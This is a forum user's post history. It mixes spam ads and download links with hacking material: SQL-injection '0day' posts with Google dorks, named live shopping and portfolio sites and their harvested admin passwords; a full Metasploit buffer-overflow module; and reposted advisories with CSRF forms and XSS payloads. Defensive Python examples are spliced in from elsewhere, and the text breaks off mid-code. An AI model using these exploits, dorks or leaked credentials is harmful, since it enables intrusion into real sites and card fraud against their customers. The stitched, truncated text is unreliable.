The_Arhitect

Active Members
  • Posts: 425
  • Days Won: 2

Everything posted by The_Arhitect

  1. Free Music -Option to search for entire albums OR songs (search, then tabs will become available) -Pulls music from three more file sharing sites (and removed [removed]) -Added search example -Entirely ad free -More coming soon Download music for free now at MosesMusic.net - Music Search Engine
  2. The proposal for Eurovision Romania by Radio 21 - Video - Trilulilu
  3. #1 YouTube Software On The Internet TUBESPY The #1 YouTube Software On The Internet Tubespy Allows You to Expertly Tap Into One of the Biggest Sources of Targeted Traffic On the Internet...And It Lets You Do it TODAY! Introducing....Tubespy We all know Youtube is the largest video website around today and it's indeed a huge cash cow to grow your business and to flood your Clickbank accounts with cash. The only problem is, most of you have no idea how to effectively get your links displayed. And what is worse is those of you who do know that it can take hours and hours of research. NOT ANY MORE!!! Watch this video for a live demo of how Tubespy works! Salespage: http://www.warriorforum.com/warrior-special-offers-forum/422346-re-warrior-special-offer-week-2700-sold-1-youtube-software-internet-rave-reviews.html Download: http://www.filesonic.it/file/1570962221/TubeSpy.zip http://www.mediafire.com/?rz3hjl5lmnd3dby
  4. 0Day Exploit 1 - Shopping Cart. # Exploit Title: CF Shopkart Shopping Site Engine [MSAcess&MYSQL SQL Injection] 0day # Date: 12/1/12 # Author: Srblche # Vendor or Software Link: http://www.webstoresltd.com/webstores.cfm and www.cfshopkart.com/ # Version: v4.x.x - v5.x.x # Category:: Webapps # Google dork: inurl:.cfm?Action=ViewDetails + "Website Content for" # Tested on: Windows 7 and Backtrack ## 18,600 results ## EXPLOIT: http://www.streetsourceleds.com/index.cfm?action=ViewDetails&ItemID=50&Category=1 [SQLi HERE] Vuln Link: http://www.streetsourceleds.com/index.cfm?action=ViewDetails&ItemID=50&Category=29 In Depth Analysis: Most CF ShopKart scripts runs either MSAccess or MYSQLv5 databases. However we can get through both. The admin directory is always located at /admin/ This 0day was made for Srblche. --------------------- TABLE [orders] CONTAINS CREDIT CARD NUMBERS, EXPIRY and SECURITY CODES TABLE [users] CONTAINS ADMIN INFO ADMIN PANEL LINK WILL ALWAYS BE AT [/admin] --------------------- MSACCESS HELP - [+] Table Names of CF ShopKart -- categories checkoutheader companyinfo contacts customerhistory discounts emaillist gallery gallerycats gallerycomments gallerynotes graphics help homepage imagecategories ipcountries links logins options order\_no orderdetails orders --------------------------->> CreditCardType,CreditCardNumber,CreditCardExpire,CCConfirmationNumber pages products promos sales sellingareas sentmessages settings settings2 shippingsurcharges shippingtable1 shippingtable2 shippingtable3 shippingtable4 shippingtable5 shippingtypes shoppingcarts stats stats\_archive storeheader taxes temporders upsconfig users ---------------------------------->> UserID,UserName,Password,UserLevel wishlistitems wishlists -------------------------------------------------------------------------------- https://www.streetsourceleds.com/(secure)/admin//admin.cfm Data Found: UserID,UserName,Password,UserLevel=20^admin^incentives^Admin Data Found: 
UserID,UserName,Password,UserLevel=22^stalerico^kazoo^Admin CVV's in only some orders. -------------------------------------------------------------------------------- https://www.zijagear.com/shop/admin/admin.cfm admin:taylor12 (paypal shop, no cc's found unless setting changed in options to store cc details) -------------------------------------------------------------------------------- EDIT NEW DORK : intext:"Powered by CFShopKart" 1 MORE DORK: inurl:/index.cfm?carttoken= (About 317,000 results (0.37 seconds) http://www.ktlcc.com/handwsportshop.com/shop/admin admin:taylor12 ============================================================= http://www.augersidekick.com Column Data: admin Data Found: username=admin Length of 'Column Data' is 10 Column Data: chrisnmarc Data Found: password=chrisnmarc
  5. E-3 Design Shopping Cart 0Day Exploit. Shopping cart exploit. MsAccess Blind. Dorks: intext:"Website by e-3 Design." inurl:"/portfolio/content.cfm?pageType=" inurl:"content.cfm?pageType=" intitle:"portfolio" ---------------------------- http://www.oceanartshawaii.com/content.cfm?pageID=15 Data Found: password=jeHni81F Data Found: username=lardav Data Found: password=75oceana11 Data Found: username=glenn http://www.oceanartshawaii.com/administration/ -------------------------------------------- http://www.nicolerubio.com/content.cfm?pageID=35 Data Found: username=lardav Data Found: password=jeHni81F Data Found: username=nicole Data Found: password=ag81Ln3 Data Found: username=nicole Data Found: password=ag81Ln3 Data Found: username=nicole ------------- http://www.lisawalshphotography.com/content.cfm?pageID=31 Data Found: username=lardav Data Found: password=jeHni81F Data Found: username=lisa Data Found: password=jeHni81F http://www.lisawalshphotography.com/administration/ -------------------------------------------------- http://brianzeglis.com/content.cfm?pageID=2 Data Found: username=lardav Data Found: password=jeHni81F Data Found: username=brian Data Found: password=b22zeg9 http://brianzeglis.com/administration/ -------------------------------------------------- http://www.stevesullyphoto.com/content.cfm?pageID=39
  6. Download : SteamRP by Ubaroo.rar Pass: ags#%321
  7. These guys have met their match too
  8. HP Diagnostics Server magentservice.exe Overflow

      require 'msf/core'

      class Metasploit3 < Msf::Exploit::Remote
        Rank = AverageRanking

        include Msf::Exploit::Remote::Tcp
        include Msf::Exploit::Remote::Seh

        def initialize(info = {})
          super(update_info(info,
            'Name'           => 'HP Diagnostics Server magentservice.exe overflow',
            'Description'    => %q{
                This module exploits a stack buffer overflow in HP Diagnostics Server
                magentservice.exe service. By sending a specially crafted packet, an
                attacker may be able to execute arbitrary code. Originally found and
                posted by AbdulAziz Hariri via ZDI.
            },
            'Author'         =>
              [
                'AbdulAziz Hariri', # Original discovery
                'hal',              # Metasploit module
              ],
            'License'        => MSF_LICENSE,
            'References'     =>
              [
                ['OSVDB', '72815'],
                ['CVE', '2011-4789'],
                ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-016/']
              ],
            'Privileged'     => true,
            'DefaultOptions' =>
              {
                'EXITFUNC'   => 'seh',
                'SSL'        => true,
                'SSLVersion' => 'SSL3'
              },
            'Payload'        =>
              {
                'Space'           => 1000,
                'BadChars'        => "\x00",
                'StackAdjustment' => -3500
              },
            'Platform'       => 'win',
            'DefaultTarget'  => 0,
            'Targets'        =>
              [
                [ 'Diagnostics Server 9.10',
                  {
                    # pop esi
                    # pop ebx
                    # ret 10
                    # magentservice.exe
                    'Ret' => 0x780c8f1f
                  }
                ]
              ],
            'DisclosureDate' => 'Jan 12 2012'))

          register_options([Opt::RPORT(23472)], self.class)
        end

        def exploit
          req  = "\x00\x00\x00\x00"
          req << rand_text_alpha_upper(1092)
          req << generate_seh_payload(target.ret)

          connect
          sock.put(req)
          handler
          disconnect
        end
      end

      Source: HP Diagnostics Server magentservice.exe Overflow
  9. Duplicate Product Code
  10. Stoneware WebNetwork6 Multiple Vulnerabilities

      Stoneware WebNetwork6 Vulnerability Assessment
      * CVE-2012-0285 - XSS
      * CVE-2012-0286 - CSRF

      Conducted by:
      * Leland Public Schools (Stoneware Customer)
      * Jacob Holcomb (Network Engineer for LPS)

      Conducted for:
      * Leland Public Schools (Purchaser of WebNetwork product. Test was to assure cloud security)
      * Stoneware INC. (Discovered Zero Day vulnerabilities reported to support in 11/2011 & 12/2011)

      Date(s) Conducted:
      * 11/2011 - Started initial Web application penetration testing
      * 12/29/2011 - Started testing of Stoneware's beta SP8 patch to resolve zero day vulnerabilities

      - Executive Summary
      The following report details the findings from the security assessment performed by Jacob Holcomb of Leland Public Schools for the clients listed in the "Conducted for" heading.

      -Web Vulnerability Assessment-
      Deficiencies Noted
      The following findings were discovered, noted, and reported during the web application assessment.
      * WebNetwork6:
        o Six stored Cross Site Scripting (XSS) Zero Day vulnerabilities discovered in the WebNetwork6 product.
        o One Cross Site Request Forgery (CSRF) Zero Day vulnerability discovered in the WebNetwork6 product.

      Overall Summary
      The web application penetration test uncovered several deficiencies in the security structure of the WebNetwork6 private/hybrid cloud solution.

      - Findings and Recommendations
      The following Zero Day findings were discovered and disclosed through manual testing and were not disclosed by an automated web application security scanner (such as Nessus, Acunetix, etc.). Recommendations to correct the issues are based on web development best practices according to OWASP (Open Web Application Security Project) and do not reflect the changes implemented by Stoneware INC. to address the security concerns in the WebNetwork6 product outlined in this document. Please see the section titled "Vendor's Solution to the problem" for a full comprehensive list of the actions taken to resolve the reported issues.

      -WebNetwork6 Vulnerability Findings-
      * XSS threats found. Input supplied by the user is not properly validated and sanitized by the Web Server application code prior to submitting the data for processing in multiple parts of the WebNetwork6 application.
        o This flaw in business programming logic allows malicious users to use the Cross Site Scripting attack vector to submit and store executable code on the server hosting WebNetwork that will be executed in a user's browser.
        o XSS flaws occur when an application includes user-supplied input in a webpage that is sent to the browser without first properly validating or escaping (sanitizing) that content.
        o Cross Site Scripting allows an attacker to execute scripts in a victim's browser to hijack user sessions, deface web sites, insert hostile content, redirect users, etc.
      * CSRF threat found. Requests sent to the Web Server application do not contain any sort of unique identifier that is tied to the user's session.
        o This flaw in business programming logic allows malicious users to use the Cross Site Request Forgery attack vector to submit a falsified HTTP request to the server and initiate a state change of user data/information on the server.
        o Cross Site Request Forgery (CSRF) takes advantage of a web application's logic and allows attackers to predict all the details of a particular action. Browsers send session IDs (cookies) for the requested website automatically when requesting that site, so an attacker can create a malicious web page, HTML post, or e-mail which then generates a forged request indistinguishable from the legitimate request and gets submitted to the server for processing.
        o Malicious hackers can cause victims (Administrator or lesser privileged users) to change any data the victim is allowed to change or perform any action the victim is authorized to use. The user must be logged in for this attack to work.
        o The CSRF can be exploited via the XSS attack vector as well, using an HTML GET request versus an HTML POST request.

      -Common Vulnerabilities and Exposure (CVE)-
      The Common Vulnerabilities and Exposures (CVE) project has assigned the following CVEs to the issues outlined in this web application penetration test report.
      * CVE-2012-0285 - XSS
      * CVE-2012-0286 - CSRF

      -WebNetwork6 Vulnerability Solutions-
      * XSS
        o All untrusted data (user data) should be properly escaped (sanitized) based on the HTML context that the data is going to be placed into.
        o Validate ALL input. If input is encoded, decode it, and then validate the length, type, characters, and format of the data being passed as input.
      * CSRF
        o To prevent CSRF the web server application should include an unpredictable synchronizer token that is unique for each HTTP request made or per user session.
        o The preferred option is to include the unique token in a hidden field. This never reveals the value in the URL; the token is put into the body of the HTTP request being sent to the server for processing.
        o The synchronizer token can also be placed in the URL itself as a URL parameter. Doing so is not recommended as it divulges this information to an attacker.

      CSRF Exploitation:
      In the following example we use CSRF to forge an HTTP POST request that will update or configure a user's alternate e-mail, password reset questions, and password reset question answers. The user must be logged in for CSRF to work.

      Exploited URL: https://NameOfServer/apps/selfService/resetPasswordOptions.jsp

      HTML code for forged POST request:

        <!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'>
        <html lang="en">
        <head>
          <title>CSRF(POST):BY Jacob Holcomb</title>
        </head>
        <body>
          <form action="https://SERVERNAME/apps/selfService/resetPasswordOptions.jsp" id="formid" method="post">
            <input type="hidden" name="submitted" value="submit" />
            <input type="hidden" name="isSimpleResetEnabled" value="false" />
            <input type="hidden" name="m_question1" value="What is your mother's maiden name?" />
            <input type="hidden" name="m_answer1" value="null" />
            <input type="hidden" name="h_answer1" value="null" />
            <input type="hidden" name="m_question2" value="What is the city you were born in?" />
            <input type="hidden" name="m_answer2" value="null" />
            <input type="hidden" name="h_answer2" value="null" />
            <input type="hidden" name="altemail" value="enteremail@here.com" />
          </form>
          <script>
            document.getElementById('formid').submit();
          </script>
        </body>
        </html>

      XSS Exploitation:
      In the following example we use HTML tags to embed malicious code on the server hosting the WebNetwork6 application. This task is accomplished by inputting tagged HTML code in fields that accept user input. I will provide a few code snippets that were used in testing, which you can find below along with the vulnerable JavaScript script that allows us to embed the arbitrary code throughout the WebNetwork6 product. The affected locations of the webNetwork6 product susceptible to XSS are the "My Blog", "TeamPages", and "News and Articles" features. Each of these sections allows us to post content to the following JavaScript (Body of the post), which does not sanitize user input. The subject line (Post title) is also susceptible to persistent XSS. Two attacks possible per WebNetwork6 feature.

      Exploited URL (Input Field): https://NameOfServer/swDashboard/pEdit/pinEditor.jsp?id=oPinEditor&crossdomain=false&autoFocus=false&new=true

        GET /swDashboard/pEdit/pinEditor.jsp?id=oPinEditor&crossdomain=false&autoFocus=false&new=true HTTP/1.1
        Host: host.domainname.com
        User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-us,en;q=0.5
        Accept-Encoding: gzip, deflate
        Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
        DNT: 1
        Referer: https://hostname/community/blog.jsp?blogName=personal
        Cookie: SWARESESSIONID=COOKIE VALUE HERE; SWARESESSIONID=COOKIE VALUE HERE; CStoneSessionID=freire-COOKIE VALUE HERE
        Connection: keep-alive

      *The URL listed above in the HTML GET request is a JavaScript text editor that does not properly validate/sanitize user input.

      XSS Code snippets:
      * <script>alert('XSS Test')</script>
      * <script>alert(document.cookie)</script>
      * <img src="https://ServerNameHere/apps/selfService/resetPasswordOptions.jsp?submitted=submit&isSimpleResetEnabled=false&m_question1=What%20is%20your%20mother's%20maiden%20name%3F&m_answer1=For%20security%20purposes%2C%20your%20saved%20answers%20are%20not%20being%20displayed.&h_answer1=9xxxxxxxxxxxd0e3&m_question2=What%20is%20the%20city%20you%20were%20born%20in%3F&m_answer2=For%20security%20purposes%2C%20your%20saved%20answers%20are%20not%20being%20displayed.&h_answer2=9xxxxxxxxxxxd0e3&altemail=xxx%40xxx.com" />
        o The img src HTML tag above allows us to submit a GET request to the server and perform our CSRF attack using an XSS attack vector to submit the falsified request.

      Compromise
      * The CSRF reported allows for a breach in directory service user accounts, which can lead to a compromise of the entire web application configuration, the server hosting the web application, and potentially other servers, end nodes, and domain services on the domain network.
      * The six stored (persistent) XSS reported allow for information disclosure and arbitrary code execution that can lead to the compromise of a user's account, machine, or other sensitive information.

      - Vendor's Solution to the problem
      Stoneware has published a security bulletin on the issues outlined in this report. You can find the contents of the bulletin at http://www.stone-ware.com/swql.jsp?kb=d1960
      An e-mail advisory was also made available to Stoneware customers, which you can find below.

      Resolution
      * Cross-Site Request Forgery - CSRF issues were addressed by inclusion of a required, session-limited security token.
      * Cross-Site Scripting - XSS issues were addressed by escaping (sanitizing) the untrusted input data.

      Stoneware Security Bulletin
      January 20, 2012

      Summary
      This security bulletin is provided to notify customers of two security vulnerabilities with the webNetwork product. Stoneware has released webNetwork 6.0 Service Pack 8 to address these issues. The vulnerabilities could allow for unintended information disclosure and breach of user accounts. The impact of exploitation of these vulnerabilities depends on the sensitivity of the content contained within webNetwork.

      Recommendation
      Stoneware recommends that customers upgrade to webNetwork 6.0 Service Pack 8 at their earliest opportunity.

      Acknowledgements
      Stoneware would like to thank Jacob Holcomb of Leland Public Schools for reporting CVE-2012-0285 and CVE-2012-0286.

      Disclaimer
      The information provided by Stoneware in this bulletin and in the Stoneware Knowledge Base is provided "as is" without warranty of any kind. Stoneware disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Stoneware, Inc. or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Stoneware, Inc. or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.

      Revisions
      1.0, 2012-January-20, Bulletin published.

      Source: Stoneware WebNetwork6 Multiple Vulnerabilities
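What the two fixes in the bulletin above look like in code, as an added example (my own illustration, not Stoneware's code; the in-memory session store, the handler, and the field names are assumptions): a per-session synchronizer token carried in a hidden field and checked on every state-changing POST, plus HTML-body escaping of post titles and bodies before they are rendered. The forged form from the report fails the check because it cannot know the token, and the `<img src=...>` GET variant fails because the handler refuses to change state on GET at all.

```python
# Added example (not Stoneware's code): synchronizer-token CSRF check and
# HTML-context escaping for the two flaw classes in the report above.
import hmac
import html
import secrets

# Constructed in-memory session store, keyed by session id. A real app keeps
# this server-side (e.g. in the servlet session) and never in a cookie value.
SESSIONS = {}


def new_session():
    """Create a session and mint its CSRF token (256 bits from the OS CSPRNG)."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"csrf_token": secrets.token_urlsafe(32)}
    return sid


def render_form(sid, action):
    """Emit the hidden-field form: the token travels in the POST body, not the URL."""
    tok = SESSIONS[sid]["csrf_token"]
    return (
        f'<form action="{html.escape(action, quote=True)}" method="post">'
        f'<input type="hidden" name="csrf_token" value="{html.escape(tok, quote=True)}" />'
        "</form>"
    )


def csrf_ok(sid, form):
    """True only if the submitted token matches the one bound to this session.

    compare_digest keeps the comparison constant-time, so an attacker cannot
    learn the token byte by byte from response timing.
    """
    sess = SESSIONS.get(sid)
    if sess is None:
        return False
    supplied = form.get("csrf_token", "")
    return hmac.compare_digest(supplied.encode(), sess["csrf_token"].encode())


def handle_reset_options(sid, method, form):
    """Simulated resetPasswordOptions handler (assumed name).

    Returns (status, message). State changes only on a POST carrying a valid
    session token; GET is refused outright, which defeats the <img src=...>
    variant the report describes.
    """
    if method != "POST":
        return 405, "state change requires POST"
    if not csrf_ok(sid, form):
        return 403, "invalid or missing CSRF token"
    SESSIONS[sid]["altemail"] = form.get("altemail", "")
    return 200, "updated"


def render_post(title, body):
    """Escape user content for the HTML-body context before it reaches the page.

    html.escape turns <, >, &, " and ' into entities, so a stored
    <script> tag in a blog title or body renders as text instead of running.
    """
    return f"<h2>{html.escape(title)}</h2><div>{html.escape(body)}</div>"


if __name__ == "__main__":
    sid = new_session()
    genuine = {"csrf_token": SESSIONS[sid]["csrf_token"], "altemail": "me@example.test"}
    forged = {"altemail": "attacker@example.test"}  # the report's hidden-field form has no token
    print(handle_reset_options(sid, "POST", genuine))   # (200, 'updated')
    print(handle_reset_options(sid, "POST", forged))    # (403, ...)
    print(handle_reset_options(sid, "GET", genuine))    # (405, ...)
    print(render_post("<script>alert(document.cookie)</script>", "hello"))
```

The token is per session here; the report also allows per-request tokens, which the same check supports if `new_session` is replaced by a mint-on-render step that stores a set of outstanding tokens. Escaping belongs at output time and per context: `html.escape` is correct for element bodies and quoted attribute values, but content placed into a URL or a JavaScript string needs that context's encoding instead.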
  11. WordPress <= 3.3.1 Multiple Vulnerabilities

      Trustwave's SpiderLabs Security Advisory TWSL2012-002:
      Multiple Vulnerabilities in WordPress
      https://www.trustwave.com/spiderlabs/advisories/TWSL2012-002.txt

      Published: 1/24/12
      Version: 1.0
      Vendor: WordPress (http://wordpress.org/)
      Product: WordPress
      Version affected: 3.3.1 and prior
      Product description: WordPress is a free and open source blogging tool and publishing platform powered by PHP and MySQL.
      Credit: Jonathan Claudius of Trustwave SpiderLabs

      Finding 1: PHP Code Execution and Persistent Cross Site Scripting Vulnerabilities via 'setup-config.php' page.
      CVE: CVE-2011-4899

      The WordPress 'setup-config.php' installation page allows users to install WordPress in local or remote MySQL databases. This typically requires a user to have valid MySQL credentials to complete. However, a malicious user can host their own MySQL database server and can successfully complete the WordPress installation without having valid credentials on the target system. After the successful installation of WordPress, a malicious user can inject malicious PHP code via the WordPress Themes editor. In addition, with control of the database store, malicious Javascript can be injected into the content of WordPress, yielding persistent Cross Site Scripting.

      Proof of Concept:

      Servers Involved
      A.B.C.D = Target WordPress Web Server
      W.X.Y.Z = Malicious User's MySQL Instance

      1.) Malicious User hosts their own MySQL instance at W.X.Y.Z on port 3306

      2.) Performs POST/GET Requests to Install WordPress into MySQL Instance

      Request #1
      ----------
        POST /wp-admin/setup-config.php?step=2 HTTP/1.1
        Host: A.B.C.D
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-us,en;q=0.5
        Accept-Encoding: gzip, deflate
        Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
        Proxy-Connection: keep-alive
        Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
        Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 81

        dbname=wordpress&uname=jsmith&pwd=jsmith&dbhost=W.X.Y.Z&prefix=wp_&submit=Submit

      Request #2
      ----------
        GET /wp-admin/install.php HTTP/1.1
        Host: A.B.C.D
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-us,en;q=0.5
        Accept-Encoding: gzip, deflate
        Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
        Proxy-Connection: keep-alive
        Referer: http://A.B.C.D/wp-admin/setup-config.php?step=2
        Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
        If-Modified-Since: Wed, 07 Dec 2011 16:03:33 GMT

      3.) Get PHP Code Execution

      Malicious user edits 404.php via Themes Editor as follows:

        <?php phpinfo(); ?>

      Note #1: Any php file in the theme could be used.
      Note #2: Depending on settings, PHP may be used to execute system commands on the webserver.

      Malicious user performs a GET request of the modified page to execute code.

      Request
      -------
        GET /wp-content/themes/default/404.php HTTP/1.1
        Host: A.B.C.D
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1

      4.) Get Persistent Cross Site Scripting

      Malicious User injects malicious Javascript into their own MySQL database instance

      MySQL Query
      -----------
        update wp_comments SET comment_content='<script>alert('123')</script>' where comment_content='Hi, this is a comment.<br />To delete \ a comment, just log in and view the post's comments. There you will have the option to edit or delete them.';

      Non-malicious User visits the Wordpress installation and has Javascript executed in their browser

      Request
      -------
        GET /?p=1 HTTP/1.1
        Host: A.B.C.D
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1

      Finding 2: Multiple Cross Site Scripting Vulnerabilities in 'setup-config.php' page
      CVE: CVE-2012-0782

      The WordPress 'setup-config.php' installation page allows users to install WordPress in local or remote MySQL databases. When using this installation page the user is asked to supply the database name, the server that the database resides on, and a valid MySQL username and password. During this process, malicious users can supply javascript within the "dbname", "dbhost" or "uname" parameters. Upon clicking the submission button, the javascript is rendered in the client's browser.

      Proof of Concept:

      Servers Involved
      A.B.C.D = Target WordPress Web Server

      Request
      -------
        POST /wp-admin/setup-config.php?step=2 HTTP/1.1
        Host: A.B.C.D
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-us,en;q=0.5
        Accept-Encoding: gzip, deflate
        Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
        Proxy-Connection: keep-alive
        Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 112

        dbname=%3Cscript%3Ealert%28%27123%27%29%3C%2Fscript%3E&uname=root&pwd=&dbhost=localhost&prefix=wp_&submit=Submit

      Finding 3: MySQL Server Username/Password Disclosure Vulnerability via 'setup-config.php' page
      CVE: CVE-2011-4898

      The WordPress 'setup-config.php' installation page allows users to install WordPress in local or remote MySQL databases. When using this installation page the user is asked to supply the database name, the server the database resides on, and a valid MySQL username and password. Malicious users can omit the "dbname" parameter during this process, allowing them to continually bruteforce MySQL instance usernames and passwords. This includes any local or remote MySQL instances which are accessible to the target web server. This can also be used as a method to proxy MySQL bruteforce attacks against other MySQL instances outside of the target organization.

      Proof of Concept:

      Servers Involved
      A.B.C.D = Target WordPress Web Server
      L.M.N.O = Any MySQL Server for which the Web Server has network access

      Request
      -------
        POST /wp-admin/setup-config.php?step=2 HTTP/1.1
        Host: A.B.C.D
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-us,en;q=0.5
        Accept-Encoding: gzip, deflate
        Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
        Proxy-Connection: keep-alive
        Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 32

        uname=mysql&pwd=mysql&dbhost=L.M.N.O

      Response (If Password is Valid)
      -------------------------------
        <---snip-->
        We were able to connect to the database server (which means your username and password is okay) but not able to select the database.
        <---snip-->

      Response (If Password is Invalid)
      ---------------------------------
        <---snip-->
        This either means that the username and password information in your wp-config.php file is incorrect or we can't contact the database server at localhost. This could mean your host's database server is down.
        <---snip-->

      Vendor Response:
      Due to the fact that the component in question is an installation script, the vendor has stated that the attack surface is too small to warrant a fix:

        "We give priority to a better user experience at the install process. It is unlikely a user would go to the trouble of installing a copy of WordPress and then not finishing the setup process more-or-less immediately. The window of opportunity for exploiting such a vulnerability is very small."

      However, Trustwave SpiderLabs urges caution in situations where the WordPress installation script is provided as part of a default image. This is often done as a convenience on hosting providers, even in cases where the client does not use the software. It is a best practice to ensure that no installation scripts are exposed to outsiders, and these vulnerabilities reinforce the importance of this step.

      Remediation Steps:
      No official fix for these issues will be released for the WordPress publishing platform. However, administrators can mitigate these issues by creating strong MySQL passwords and defining rules within a web application firewall (WAF) solution. ModSecurity (http://www.modsecurity.org/) has added rules to the commercial rules feed for these issues, and Trustwave's vulnerability scanning solution, TrustKeeper, has been updated to detect exposed installation scripts.

      Vendor Communication Timeline:
      12/22/11 - Vulnerability disclosed
      01/16/12 - Confirmation to release vulnerabilities
      01/24/12 - Advisory published

      References
      1. http://www.wordpress.org

      About Trustwave:
      Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com

      About Trustwave's SpiderLabs:
      SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs

      Disclaimer:
      The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.

      Source: WordPress <= 3.3.1 Multiple Vulnerabilities
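An added example (my own, not Trustwave's or WordPress's code) of the "detect exposed installation scripts" remediation from the advisory above: parse combined-format web-server access log lines, flag every request for setup-config.php or install.php that did not come from an allowlisted administrator address, and count repeated step=2 POSTs per client, which is what the Finding 3 credential check looks like from the server side. The log lines, the addresses, the allowlist and the threshold are all constructed for the example.

```python
# Added example (not from the advisory): find requests for the WordPress
# installer scripts in access logs and flag clients repeating the step=2 POST.
import re
from collections import Counter

# Apache/nginx "combined" log format; only the fields used below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Installer endpoints the advisory says should never be reachable by outsiders.
INSTALLER_PATHS = ("/wp-admin/setup-config.php", "/wp-admin/install.php")

# Constructed sample: one outside client repeating the step=2 POST (the
# credential-check pattern), one touching install.php, one normal page view,
# and one internal admin address doing a legitimate install.
SAMPLE_LOG = """\
203.0.113.7 - - [24/Jan/2012:10:00:01 +0000] "GET /wp-admin/setup-config.php?step=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [24/Jan/2012:10:00:02 +0000] "POST /wp-admin/setup-config.php?step=2 HTTP/1.1" 200 3210 "-" "Mozilla/5.0"
203.0.113.7 - - [24/Jan/2012:10:00:03 +0000] "POST /wp-admin/setup-config.php?step=2 HTTP/1.1" 200 3210 "-" "Mozilla/5.0"
203.0.113.7 - - [24/Jan/2012:10:00:04 +0000] "POST /wp-admin/setup-config.php?step=2 HTTP/1.1" 200 3210 "-" "Mozilla/5.0"
203.0.113.7 - - [24/Jan/2012:10:00:05 +0000] "POST /wp-admin/setup-config.php?step=2 HTTP/1.1" 200 3210 "-" "Mozilla/5.0"
203.0.113.7 - - [24/Jan/2012:10:00:06 +0000] "POST /wp-admin/setup-config.php?step=2 HTTP/1.1" 200 3210 "-" "Mozilla/5.0"
198.51.100.4 - - [24/Jan/2012:10:01:00 +0000] "GET /?p=1 HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
198.51.100.4 - - [24/Jan/2012:10:01:30 +0000] "GET /wp-admin/install.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.5 - - [24/Jan/2012:10:02:00 +0000] "GET /wp-admin/setup-config.php?step=0 HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return a dict of ip/ts/method/path/query/status, or None for non-matching lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"], _, rec["query"] = rec["path"].partition("?")
    return rec


def analyze(lines, allowlist=frozenset(), post_threshold=5):
    """Scan access-log lines for installer-script exposure.

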